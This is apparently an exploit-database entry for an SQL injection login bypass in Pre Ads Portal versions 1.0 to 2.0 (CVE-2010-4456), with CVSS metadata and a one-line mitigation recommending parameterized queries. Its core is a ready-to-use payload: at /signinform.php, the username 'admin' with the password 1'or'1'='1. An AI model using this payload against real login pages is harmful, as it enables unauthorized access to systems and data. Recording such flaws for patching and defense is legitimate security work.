vendor:
Pre Ads Portal
by:
Cru3l.b0y
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pre Ads Portal
Affected Version From: 1.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: CVE-2010-4456
CPE: a:preproject:pre_ads_portal
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010
PRE ADS PORTAL SQL Bypass Vulnerability
go to /signinform.php Username : admin Password : 1'or'1'='1
Mitigation:
The best way to mitigate this vulnerability is to use parameterized queries. This will ensure that the user input is treated as a string value and not as a part of the SQL query.